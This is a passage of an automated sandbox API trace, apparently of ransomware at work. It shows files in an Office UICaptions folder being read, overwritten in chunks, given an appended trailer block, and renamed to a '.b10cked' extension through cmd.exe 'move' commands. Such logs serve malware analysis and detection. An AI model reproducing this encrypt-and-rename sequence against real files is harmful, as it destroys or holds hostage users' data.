lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.019] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.020] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.020] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.020] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x49f60 [0153.020] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.020] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x49a78 [0153.020] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x49f60 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x49f60 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0153.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0153.106] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.140] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.141] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0153.143] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0153.143] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.143] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.143] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0153.143] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x29f60 [0153.144] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.144] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0153.145] ReadFile (in: hFile=0x114, lpBuffer=0x14849d8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0153.147] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x29f60 [0153.147] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.147] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0153.148] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0153.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPIR.DLL.trx_dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0153.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPIR.DLL.trx_dll", cchWideChar=17, lpMultiByteStr=0x1328744, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAPIR.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 17 [0153.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x49f60 [0153.152] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0153.152] CloseHandle (hObject=0x114) returned 1 [0153.154] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX") returned 0x3c [0153.155] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0153.155] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xd6c, dwThreadId=0xe94)) returned 1 [0153.168] CloseHandle (hObject=0x110) returned 1 [0153.168] CloseHandle (hObject=0x114) returned 1 [0153.168] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0153.168] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0153.168] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0153.168] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.168] ReleaseMutex (hMutex=0xf8) returned 1 [0153.168] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.168] ReleaseMutex (hMutex=0xf8) returned 1 [0153.168] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.168] ReleaseMutex (hMutex=0xf8) returned 1 [0153.168] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.168] ReleaseMutex (hMutex=0xf8) returned 1 [0153.168] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0153.169] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.169] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.169] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.169] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20995846402) returned 1 [0153.169] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.169] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.169] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.169] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.169] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xc160 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0153.170] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0153.171] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xbc78 [0153.171] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0153.184] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0153.184] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0153.185] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xc160 [0153.185] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0153.185] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0153.185] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0153.185] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xc160 [0153.185] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0153.185] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0153.185] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x60af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x60af, lpOverlapped=0x0) returned 1 [0153.194] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0153.194] WriteFile (in: hFile=0x114, lpBuffer=0x14849d8*, nNumberOfBytesToWrite=0x60af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesWritten=0x12ec1c*=0x60af, lpOverlapped=0x0) returned 1 [0153.194] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24751, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60b1 [0153.194] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x60af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x60af, lpOverlapped=0x0) returned 1 [0153.195] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24751, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60b1 [0153.195] WriteFile (in: hFile=0x114, lpBuffer=0x14849d8*, nNumberOfBytesToWrite=0x60af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14849d8*, lpNumberOfBytesWritten=0x12ec1c*=0x60af, lpOverlapped=0x0) returned 1 [0153.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MOR6INT.REST.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0153.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MOR6INT.REST.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MOR6INT.REST.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0153.200] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xc160 [0153.200] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0153.200] CloseHandle (hObject=0x114) returned 1 [0153.202] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX") returned 0x3c [0153.202] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0153.203] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xe20, dwThreadId=0xeac)) returned 1 [0153.232] CloseHandle (hObject=0x110) returned 1 [0153.232] CloseHandle (hObject=0x114) returned 1 [0153.232] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0153.232] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0153.233] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0153.233] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.233] ReleaseMutex (hMutex=0xf8) returned 1 [0153.233] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.233] ReleaseMutex (hMutex=0xf8) returned 1 [0153.233] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0153.233] ReleaseMutex (hMutex=0xf8) returned 1 [0153.233] 